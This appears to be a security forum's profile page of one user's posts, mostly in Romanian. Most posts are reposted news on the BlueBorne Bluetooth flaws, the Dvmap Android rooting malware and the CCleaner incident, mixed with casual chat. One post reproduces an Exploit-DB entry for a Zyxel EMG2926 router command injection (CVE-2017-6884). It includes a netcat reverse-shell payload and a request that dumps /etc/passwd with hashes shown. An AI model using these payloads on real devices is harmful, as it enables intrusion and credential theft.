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Everything posted by usrnm

  1. L-am dezistalat si eu, pacat de el, era un programel folosit de ani buni si chiar isi facea treaba. Acum, tinand cont ca apartine companiei Avast, nu stiu ce incredere poti avea si in AV-ul lor... Pentru cine nu a citit raportul cu analiza tehnica: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
  2. Eight Bluetooth-related vulnerabilities (four that are critical) affecting over 5 billion Android, Windows and Linux devices could allow attackers to take control of devices, access corporate data and networks, and easily spread malware to other devices. Nearly all devices with Bluetooth capabilities, including smartphones, TVs, laptops, watches, smart TVs, and even some automobile audio systems, are vulnerable to this attack. If exploited, the vulnerabilities could enable an attacker to take over devices, spread malware, or establish a "man-in-the-middle" to gain access to critical data and networks without user interaction. The vulnerabilities were found in the Bluetooth implementations in Android, Microsoft, Linux and iOS versions pre-iOS 10. Armis reported the vulnerabilities to Google, Microsoft, and the Linux community. Google and Microsoft are releasing updates and patches on Tuesday, September 12. Others are preparing patches that are in various stages of being released. These vulnerabilities are the most serious Bluetooth vulnerabilities identified to date. Previously identified flaws found in Bluetooth were primarily at the protocol level. These new vulnerabilities are at the implementation level, bypassing the various authentication mechanisms, and enabling a complete takeover of the target device. These proximity-based network vulnerabilities could allow attackers to create broad malware infections that could spread from one infected device to many others by wirelessly connecting to other devices over Bluetooth. The device-to-device connectivity nature of Bluetooth means an airborne (or "BlueBorne") attack could easily spread without any action required by a user. "These silent attacks are invisible to traditional security controls and procedures. Companies don't monitor these types of device-to-device connections in their environment, so they can't see these attacks or stop them," said Yevgeny Dibrov, CEO of Armis. "The research illustrates the types of threats facing us in this new connected age." There are two specific methods attackers could use with exploit code. They could: Connect to the target device in an undetected manner, then remotely execute code on that device. This would allow the attacker to take full control of a system, up to and including leveraging the device to gain access to corporate networks, systems, and data. Conduct a Man-in-the-Middle attack — effectively creating a Bluetooth Pineapple — to sniff traffic being sent between Bluetooth-enabled devices or spoof a legitimate Bluetooth device and hijack the connection and redirect traffic. This would enable attackers to download malware to devices and take complete control of them. This attack would not require additional hardware, as it uses the Bluetooth connection on the device against the device itself. The automatic connectivity of Bluetooth, combined with the fact that nearly all devices have Bluetooth enabled by default, makes these vulnerabilities all the more serious and pervasive. Once a device is infected with malware, it can then easily broadcast the malware to other Bluetooth-enabled devices in its vicinity, either inside an office or in more public locations. While waiting for the patch, users can disable Bluetooth to protect devices. SURSA: htp:/www.prnewswire.com/news-releases/armis-identifies-new-airborne-cyber-threat-blueborne-that-exposes-almost-every-device-to-remote-attack-30051700.html
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  3. Sursa: http://thehackernews.com/2017/06/android-rooting-malware.html A new Android-rooting malware with an ability to disable device’ security settings in an effort to perform malicious tasks in the background has been detected on the official Play Store. What's interesting? The app was smart enough to fool Google security mechanism by first pretending itself to be a clean app and then temporarily replacing it with a malicious version. Security researchers at Kaspersky Lab discovered a new piece of Android rooting malware that was being distributed as gaming apps on the Google Play Store, hiding behind puzzle game "colourblock," which was being downloaded at least 50,000 times prior to its removal. Dubbed Dvmap, the Android rooting malware disables device's security settings to install another malicious app from a third-party source and also injects malicious code into the device system runtime libraries to gain root access and stay persistent. "To bypass Google Play Store security checks, the malware creators used a very interesting method: they uploaded a clean app to the store at the end of March, 2017, and would then update it with a malicious version for short period of time," the researchers said. "Usually they would upload a clean version back on Google Play the very same day. They did this at least 5 times between 18 April and 15 May." Here's How Dvmap Malware Works Dvmap Trojan works on both 32-bit and 64-bit versions of Android, which once installed, attempts to gain root access on the device and tries to install several modules on the system including a few written in Chinese, along with a malicious app called "com.qualcmm.timeservices." To make sure the malicious module gets executed with system rights, the malware overwrites system's runtime libraries depending on which Android version the device is running. To complete the installation of the above-mentioned malicious app, the Trojan with system rights turns off "Verify Apps," feature and modify system setting to allow app installation from 3rd party app stores. "Furthermore, it can grant the "com.qualcmm.timeservices" app Device Administrator rights without any interaction with the user, just by running commands. It is a very unusual way to get Device Administrator rights," the researchers said. This malicious 3rd party app is responsible for connecting the infected device to the attacker's command-and-control server, giving out full control of the device into the hands of attackers. However, the researchers said, they haven't noticed any commands received by the infected Android devices so far, so it's unclear "what kind of files will be executed, but they could be malicious or advertising files." How to Protect Yourself Against Dvmap Malware Researchers are still testing the Dvmap malware, but meanwhile, advise users who installed the puzzle game in question to back up their device's data and perform a full factory data reset in an effort to mitigate the malware. To prevent yourself from being targeted by such apps, always beware of fishy apps, even when downloading from Google Play Store, and try to stick to the trusted brands only. Moreover, always look at the comments left by other users. Always verify app permissions before installing any app and grant only those permissions which have relevant context for the app's purpose. Last but not the least, always keep a good antivirus app on your device that can detect and block such malware before it can infect your device and keep it up-to-date.
  4. Se pare ca e vorba de asta: https://www.hybrid-analysis.com/sample/b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25?environmentId=100 E cea mai completa analiza gasita pana acum
  5. Da, mergea doar pe whatsapp web, dar ultimul update a rezolvat problema. Interesant totusi ca poti sa te loghezi cu acelasi cont de pe mai multe PC-uri in acelasi timp.
  6. [Sursa: https://www.exploit-db.com/exploits/41782/?rss ] # Exploit Title: Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection # Date: 2017-04-02 # Exploit Author: Fluffy Huffy (trevor Hough) # Vendor Homepage: www.zyxel.com # Version: EMG2926 - V1.00(AAQT.4)b8 # Tested on: linux # CVE : CVE-2017-6884 OS command injection vulnerability was discovered in a commonly used home router (zyxel - EMG2926 - V1.00(AAQT.4)b8). The vulnerability is located in the diagnostic tools specify the nslookup function. A malicious user may exploit numerous vectors to execute arbitrary commands on the router. Exploit (Reverse Shell);stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button& ping_ip=google.ca%20%3B%20nc%20192.168.0.189%204040%20-e%20/p Exploit (Dump Password File) Request GET /cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%3b%20cat%20/etc/passwd&server_ip= HTTP/1.1 Host: Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer:;stok=<Clipped>/expert/maintenance/diagnostic/nslookup Accept-Language: en-US,en;q=0.8 Cookie: csd=9; sysauth=<Clipped> Connection: close Response (Clipped) <textarea cols="80" rows="15" readonly="true">root:x:0:0:root:/root:/bin/ash daemon:*:1:1:daemon:/var:/bin/false ftp:*:55:55:ftp:/home/ftp:/bin/false network:*:101:101:network:/var:/bin/false nobody:*:65534:65534:nobody:/var:/bin/false supervisor:$1$RM8l7snU$KW2C58L2Ijt0th1ThR70q0:0:0:supervisor:/:/bin/ash admin:$1$<Clipped>:0:0:admin:/:/bin/fail
  7. https://cybellum.com/doubleagentzero-day-code-injection-and-persistence-technique/ https://cybellum.com/doubleagent-taking-full-control-antivirus/
  8. Iti recomand sa te uiti putin si pe pagina asta, e un proiect interesant facut de niste italieni: http://www.caine-live.net/ Succes!
  9. Nimic nou pe frontul de Vest- Erich Maria Remarque. O carte excelenta, voi cauta ecranizarea, am citit ca exista.
  10. usrnm


    http://www.independent.co.uk/life-style/gadgets-and-tech/news/facebook-photos-match-strangers-face-facezam-app-a7629836.html - Bine spus creepy app...
  11. Foarte tare, felicitari! Asa cum spunea si Spuickeru, ai grija ca e posibil ca toata munca ta sa o preia altcineva, sa ii faca o interfata si sa o scoata la vanzare, asa ca gandeste-te de 2 ori inainte de a posta linkul de download! Bafta in continuare
  12. usrnm


    care ati infipt leenks.com? gj
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